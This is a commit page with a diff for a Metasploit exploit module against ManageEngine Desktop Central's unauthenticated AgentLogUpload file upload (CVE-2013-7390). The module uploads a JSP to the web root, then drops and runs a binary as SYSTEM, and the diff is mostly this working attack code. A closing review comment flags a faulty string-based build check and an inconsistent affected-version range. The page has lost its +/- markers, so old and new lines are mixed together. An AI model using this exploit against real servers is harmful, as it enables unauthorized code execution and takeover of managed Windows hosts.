Refactor and rename desktopcentra_file_upload
- Rewrite check method - Declare that v7 is also exploitable (tested and it works) - Rename to dc_agentlogupload_file_upload to match the other DC module's naming convention - Add CVE / OSVDB / Full disclosure references
bug/bundler_fix
parent
9e8658268b
commit
d69049008c
|
@ -15,11 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'DesktopCentral AgentLogUpload Arbitrary File Upload',
|
||||
'Name' => 'ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary file upload vulnerability in DesktopCentral 8.0.0
|
||||
below build 80293. A malicious user can upload a JSP file into the web root without
|
||||
authentication, leading to arbitrary code execution.
|
||||
This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to
|
||||
v8 build 80293. A malicious user can upload a JSP file into the web root without
|
||||
authentication, leading to arbitrary code execution as SYSTEM.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -28,13 +28,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf' ]
|
||||
[ 'CVE', '2013-7390' ],
|
||||
[ 'OSVDB', '100008' ],
|
||||
[ 'URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2013/Nov/130' ],
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'ManageEngine DesktopCentral 8 server / Windows', {} ]
|
||||
[ 'Desktop Central v7 - v8 build 80292 / Windows', {} ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -44,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options([Opt::RPORT(8020)], self.class)
|
||||
end
|
||||
|
||||
|
||||
def upload_file(filename, contents)
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri('agentLogUploader'),
|
||||
|
@ -65,34 +69,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
# Test for Desktop Central
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("configurations.do"),
|
||||
'method' => 'GET'
|
||||
'uri' => normalize_uri("configurations.do"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body.to_s =~ /ManageEngine Desktop Central 8/ and res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/
|
||||
build = $1
|
||||
print_status("Manage Desktop Central 8 build #{build} found")
|
||||
if res and res.code == 200
|
||||
build = "0"
|
||||
if res.body.to_s =~ /ManageEngine Desktop Central 7/ or
|
||||
res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7
|
||||
print_status("#{peer} - Detected Desktop Central v7")
|
||||
elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ or
|
||||
res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
|
||||
if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
|
||||
build = $1
|
||||
print_status("#{peer} - Detected Desktop Central v8 #{build}")
|
||||
else # DC v8 (earlier versions)
|
||||
print_status("#{peer} - Detected Desktop Central v8")
|
||||
end
|
||||
elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
|
||||
build = $1
|
||||
end
|
||||
if build < "80293"
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("agentLogUploader"),
|
||||
'method' => 'POST'
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Uploading JSP to execute the payload")
|
||||
|
||||
|
@ -117,6 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
end
|
||||
|
||||
|
||||
def jsp_drop_bin(bin_data, output_file)
|
||||
jspraw = %Q|<%@ page import="java.io.*" %>\n|
|
||||
jspraw << %Q|<%\n|
|
||||
|
@ -144,6 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
jspraw
|
||||
end
|
||||
|
||||
|
||||
def jsp_execute_command(command)
|
||||
jspraw = %Q|\n|
|
||||
jspraw << %Q|<%\n|
|
||||
|
@ -153,6 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
jspraw
|
||||
end
|
||||
|
||||
|
||||
def jsp_drop_and_execute(bin_data, output_file)
|
||||
jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
|
||||
end
|
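Review bot: The version gate in the rewritten `check` (the page has lost its +/- markers, so I am reading the `build = "0"` variant as the new side) compares build numbers as strings in `if build < "80293"`, so the ordering is lexicographic. A build with more digits, such as a constructed value of "100000", sorts below "80293" and would be reported as `Appears`. Because `build` starts at "0" and stays there when none of the banner patterns match, any host that merely answers 200 on `configurations.do` is also reported as `Appears`, and the `agentLogUploader` probe further down is never reached for it. I would initialise `build = nil`, assign "0" only inside the v7 and early-v8 branches, gate on `if build && build.to_i < 80293`, and return `Safe` only when a build was actually read, so that unrecognised pages fall through to the probe. Separately, the description ("v7 to v8 build 80293") and the target name ("build 80292") disagree on whether 80293 is affected; the old wording "below build 80293" matches the comparison and is unambiguous.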